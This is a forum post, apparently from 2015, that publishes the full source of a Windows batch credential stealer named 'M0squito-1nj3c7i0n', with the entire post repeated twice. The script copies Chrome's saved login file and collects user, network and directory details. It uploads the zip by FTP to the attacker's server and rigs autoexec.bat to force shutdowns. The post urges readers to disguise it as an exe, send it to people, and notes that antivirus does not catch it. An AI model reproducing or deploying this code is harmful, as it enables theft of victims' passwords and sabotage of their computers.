Post by Admin on May 16, 2015 4:45:10 GMT
M0squito-1nj3c7i0n script
by pandaleader
function :
1.steal chrome user password with ftp method ( ftp put )
2.shutkit ( make pc affected autoexec.bat to shutdown when reboot
3.showing victim look like pc with directory access ( dir )
File required to access mosquito-injection
--------------------------------------
1. m0squito-1nj3c7ion.bat
2. setting.ini
save file as m0squito-1nj3c7ion.bat and convert to exe
rem * start at above or this line
@echo OFF
msg * "This item required FTP access.please off your firewall or this file will not run as expect !!!"
if exist %temp%\M0squito-iNj3C7i0n\ goto continue
if not exist %temp%\M0squito-iNj3C7i0n\ goto create
:create
mkdir %temp%\M0squito-iNj3C7i0n\
goto nextmos
:continue
del C:\Users\asus\AppData\Local\Temp\M0squito-iNj3C7i0n\ /q
goto nextmos
:nextmos
echo. >%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo ~ .I. ~ M0squito >>%temp%\M0squito-iNj3C7i0n\data.txt
echo ~\/ {....} \/~ iNj3C7i0n v1.0 >>%temp%\M0squito-iNj3C7i0n\data.txt
echo ~___=__\-{0000}-/__ =___~ Stealth >>%temp%\M0squito-iNj3C7i0n\data.txt
echo /0/~_/ /~/ { } \ ~\\_~\0\ visit official website >>%temp%\M0squito-iNj3C7i0n\data.txt
echo \/~ __/~~0000000~~~\__~\/ www.pandawindow.board.net >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo Account info :
echo . users : %username%>>%temp%\M0squito-iNj3C7i0n\data.txt
echo Version:>>%temp%\M0squito-iNj3C7i0n\data.txt
ver >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo all account installed :>>%temp%\M0squito-iNj3C7i0n\data.txt
dir C:\users\>>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo ip adress and arp >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
arp -a >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%%temp%\M0squito-iNj3C7i0n\data.txt
copy "C:\users\%username%\appdata\local\google\chrome\user data\default\login data." %temp%\M0squito-iNj3C7i0n\"
ren "%temp%\M0squito-iNj3C7i0n\login data." "%username% chrome."
echo %username% Target Directories >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
dir C:\Users\asus\Documents>>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
dir C:\users\%username%\desktop\>>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
dir "C:\program files\" >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
dir D: >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
dir C:\users\%username%\downloads
echo.
echo Change " %username% chrome." to "login data." and use chromepass decryptor >>%temp%\M0squito-iNj3C7i0n\data.txt
echo ( securityXploded.com chromepass decryptor)to decrypt all victim chrome password .>>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo powered by www.cutepandasec.blogspot.com >>%temp%\M0squito-iNj3C7i0n\data.txt
if exist "C:\Program Files\ESTsoft\ALZip\" goto compressAl
if not exist "C:\Program Files\ESTsoft\ALZip\" goto compressWinzip
:compressAl
call "C:\Program Files\ESTsoft\ALZip\ALZipCon.exe" -a "%temp%\M0squito-iNj3C7i0n\" "%temp%\M0squito-iNj3C7i0n\%username%.zip"
goto next000
:compressWinzip
call "C:\program files\winrar\winrar.exe -a %temp%\M0squito-iNj3C7i0n\ "%temp%\M0squito-iNj3C7i0n\%username%.zip"
goto next000
:next000
copy setting.ini %temp%\M0squito-iNj3C7i0n\
ren %temp%\M0squito-iNj3C7i0n\setting.ini ftp.bat
call %temp%\M0squito-iNj3C7i0n\ftp.bat
:endftp
echo @echo off >%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo if exist C:\windows\system32 goto win32box>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo if not exist C:\windows\system32 goto win64box>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo :win32box>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo msg * file must run in .Net v5.303913 !!>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo :0>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo exit>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
start %temp%\M0squito-iNj3C7i0n\fakebox.bat
attrib -h C:\autoexec.bat
echo. >>C:\autoexec.bat
echo msg * system error !!.file was not run expectly.shutting down....>>C:\autoexec.bat
echo shutdown /s /f /c " shutdown computer #M0squito-iNj3C7i0n">>C:\autoexec.bat
shutdown /s /f /c " shutting down %username% computer... #M0squito-iNj3C7i0n"
del %temp%\M0squito-iNj3C7i0n\*.* /q
rem * script was ended
save this another file as setting.ini and bring on this file with m0squito-1nj3c7ion.bat
rem * start here
@echo off
rem ---------------------- Send ---------------------------------
echo o 127.0.0.1>%temp%\M0squito-iNj3C7i0n\%username%ftp.dat
echo user "yourusername" >>%temp%\M0squito-iNj3C7i0n\%username%ftp.dat rem * edit username to your ftp account user
echo "password" >>%temp%\M0squito-iNj3C7i0n\%username%ftp.dat rem * edit password to your ftp account password
echo put "%temp%\M0squito-iNj3C7i0n\%temp%\M0squito-iNj3C7i0n\%username%.zip">>%temp%\M0squito-iNj3C7i0n\%username%ftp.dat
echo quit >>%temp%\M0squito-iNj3C7i0n\%username%ftp.dat
ftp -n -s:%temp%\M0squito-iNj3C7i0n\%username%ftp.dat
rem --------------------- End ------------------------------------
goto endftp
ren * script was ended
compress to rar and send to people
#for this time this script was not detected by avast security scanner or some antivirus.you can check through virus total
by pandaleader
function :
1.steal chrome user password with ftp method ( ftp put )
2.shutkit ( make pc affected autoexec.bat to shutdown when reboot
3.showing victim look like pc with directory access ( dir )
File required to access mosquito-injection
--------------------------------------
1. m0squito-1nj3c7ion.bat
2. setting.ini
save file as m0squito-1nj3c7ion.bat and convert to exe
rem * start at above or this line
@echo OFF
msg * "This item required FTP access.please off your firewall or this file will not run as expect !!!"
if exist %temp%\M0squito-iNj3C7i0n\ goto continue
if not exist %temp%\M0squito-iNj3C7i0n\ goto create
:create
mkdir %temp%\M0squito-iNj3C7i0n\
goto nextmos
:continue
del C:\Users\asus\AppData\Local\Temp\M0squito-iNj3C7i0n\ /q
goto nextmos
:nextmos
echo. >%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo ~ .I. ~ M0squito >>%temp%\M0squito-iNj3C7i0n\data.txt
echo ~\/ {....} \/~ iNj3C7i0n v1.0 >>%temp%\M0squito-iNj3C7i0n\data.txt
echo ~___=__\-{0000}-/__ =___~ Stealth >>%temp%\M0squito-iNj3C7i0n\data.txt
echo /0/~_/ /~/ { } \ ~\\_~\0\ visit official website >>%temp%\M0squito-iNj3C7i0n\data.txt
echo \/~ __/~~0000000~~~\__~\/ www.pandawindow.board.net >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo Account info :
echo . users : %username%>>%temp%\M0squito-iNj3C7i0n\data.txt
echo Version:>>%temp%\M0squito-iNj3C7i0n\data.txt
ver >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo all account installed :>>%temp%\M0squito-iNj3C7i0n\data.txt
dir C:\users\>>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo ip adress and arp >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
arp -a >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%%temp%\M0squito-iNj3C7i0n\data.txt
copy "C:\users\%username%\appdata\local\google\chrome\user data\default\login data." %temp%\M0squito-iNj3C7i0n\"
ren "%temp%\M0squito-iNj3C7i0n\login data." "%username% chrome."
echo %username% Target Directories >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
dir C:\Users\asus\Documents>>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
dir C:\users\%username%\desktop\>>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
dir "C:\program files\" >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
dir D: >>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
dir C:\users\%username%\downloads
echo.
echo Change " %username% chrome." to "login data." and use chromepass decryptor >>%temp%\M0squito-iNj3C7i0n\data.txt
echo ( securityXploded.com chromepass decryptor)to decrypt all victim chrome password .>>%temp%\M0squito-iNj3C7i0n\data.txt
echo. >>%temp%\M0squito-iNj3C7i0n\data.txt
echo powered by www.cutepandasec.blogspot.com >>%temp%\M0squito-iNj3C7i0n\data.txt
if exist "C:\Program Files\ESTsoft\ALZip\" goto compressAl
if not exist "C:\Program Files\ESTsoft\ALZip\" goto compressWinzip
:compressAl
call "C:\Program Files\ESTsoft\ALZip\ALZipCon.exe" -a "%temp%\M0squito-iNj3C7i0n\" "%temp%\M0squito-iNj3C7i0n\%username%.zip"
goto next000
:compressWinzip
call "C:\program files\winrar\winrar.exe -a %temp%\M0squito-iNj3C7i0n\ "%temp%\M0squito-iNj3C7i0n\%username%.zip"
goto next000
:next000
copy setting.ini %temp%\M0squito-iNj3C7i0n\
ren %temp%\M0squito-iNj3C7i0n\setting.ini ftp.bat
call %temp%\M0squito-iNj3C7i0n\ftp.bat
:endftp
echo @echo off >%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo if exist C:\windows\system32 goto win32box>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo if not exist C:\windows\system32 goto win64box>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo :win32box>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo msg * file must run in .Net v5.303913 !!>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo :0>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
echo exit>>%temp%\M0squito-iNj3C7i0n\fakebox.bat
start %temp%\M0squito-iNj3C7i0n\fakebox.bat
attrib -h C:\autoexec.bat
echo. >>C:\autoexec.bat
echo msg * system error !!.file was not run expectly.shutting down....>>C:\autoexec.bat
echo shutdown /s /f /c " shutdown computer #M0squito-iNj3C7i0n">>C:\autoexec.bat
shutdown /s /f /c " shutting down %username% computer... #M0squito-iNj3C7i0n"
del %temp%\M0squito-iNj3C7i0n\*.* /q
rem * script was ended
save this another file as setting.ini and bring on this file with m0squito-1nj3c7ion.bat
rem * start here
@echo off
rem ---------------------- Send ---------------------------------
echo o 127.0.0.1>%temp%\M0squito-iNj3C7i0n\%username%ftp.dat
echo user "yourusername" >>%temp%\M0squito-iNj3C7i0n\%username%ftp.dat rem * edit username to your ftp account user
echo "password" >>%temp%\M0squito-iNj3C7i0n\%username%ftp.dat rem * edit password to your ftp account password
echo put "%temp%\M0squito-iNj3C7i0n\%temp%\M0squito-iNj3C7i0n\%username%.zip">>%temp%\M0squito-iNj3C7i0n\%username%ftp.dat
echo quit >>%temp%\M0squito-iNj3C7i0n\%username%ftp.dat
ftp -n -s:%temp%\M0squito-iNj3C7i0n\%username%ftp.dat
rem --------------------- End ------------------------------------
goto endftp
ren * script was ended
compress to rar and send to people
#for this time this script was not detected by avast security scanner or some antivirus.you can check through virus total